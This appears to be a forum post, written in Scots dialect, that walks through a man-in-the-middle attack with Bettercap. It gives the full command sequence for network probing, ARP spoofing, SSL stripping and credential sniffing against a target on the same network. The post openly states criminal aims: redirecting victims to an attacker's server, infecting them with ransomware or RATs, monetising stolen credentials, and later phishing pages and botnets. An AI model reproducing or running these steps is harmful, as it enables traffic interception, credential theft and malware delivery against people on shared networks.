Sniffin' HTTPS and tryin' tae find credentials aw day on a network is deid so don't focus too much on this because ye are verra late, this ain´t 2010s years. Capturin' ony type o' useful data in the present day and age isnae gaun tae happen in a timely fashion. we ken oor limitations wi' MiTM attacks and HTTP (no website uses this protocol anymore), HTTPS, and HSTS, so yer ultimate goal should be re-directin' everyone on the network tae yer web server and infectin' them wi' malware, RAT, or ransomware. Dinnae try and capture credentials o'er the wire. That ain't happenin'. Besides, dependin' on whit type o' ransomware or malware ye infect them wi' ye'll be able tae siphon their account credentials and monetize that data accordingly by infectin' them.
Prerequisites:
- An attacker computer runnin' Kali VM, directly frae USB, or as the host OS.
- A separate computer tae act as the target (Updated Windows or macOS preferably).
- Attacker and Target computer connected tae the same hame network as ye wi' internet connectivity.
- Bettercap (https://www.bettercap.org). This is the maist modernized tool used the day and has sae mony improvements compared tae Ettercap that maist modern attackers/professionals utilize this tool for their engagements.
Bettercap can sniff:
URLs bein' visited.
HTTPS hosts bein' visited.
HTTP POSTed data.
HTTP Basic and Digest authentications.
HTTP Cookies.
FTP credentials.
IRC credentials.
POP, IMAP and SMTP credentials.
NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
DICT Protocol credentials.
MPD Credentials.
NNTP Credentials.
DH***** messages and authentication.
REDIS login credentials.
RLOGIN credentials.
SNPP credentials.
METHOD:
Ma example target computer IP is 192.168.100.1
In Kali open up a new terminal windae and type the following:
Code: Select all
sudo bettercapCode: Select all
net.probe onWait 30 seconds for it tae discover network hosts.
Code: Select all
net.probe offCode: Select all
net.showThis will show ye the targets on the network. Pay attention tae yer target IP.
Code: Select all
set https.proxy.sslstrip trueCode: Select all
set net.sniff.verbose falseCode: Select all
set arp.spoof.targets TARGET_IPMA EXAMPLE: set arp.spoof.targets 192.168.100.1
Code: Select all
set arp.spoof.internal trueCode: Select all
net.sniff onCode: Select all
https.proxy onCode: Select all
arp.spoof onOn yer target computer open a web browser wi' a "New Private Windae" and visit: https://senglehardt.com/demo/no_boundaries/loginmanager
Dependin' on which browser ye're usin' will dictate the HTTPS errors displayed tae ye. These are the warnin's that users are presented wi' when a MiTM attack is happenin' against them. Go ahead and click "Advanced" or similar tae click through the warnin's and visit: https://senglehardt.com/demo/no_boundaries/loginmanager
Alright, I´ll writin' asap aboot hoo ye can gie the users tae yer shady wabsite tae deliver some malware or set up a phishin' login page, or infect some devices in the network tae use them as botnets or inject RATs, an' a' that.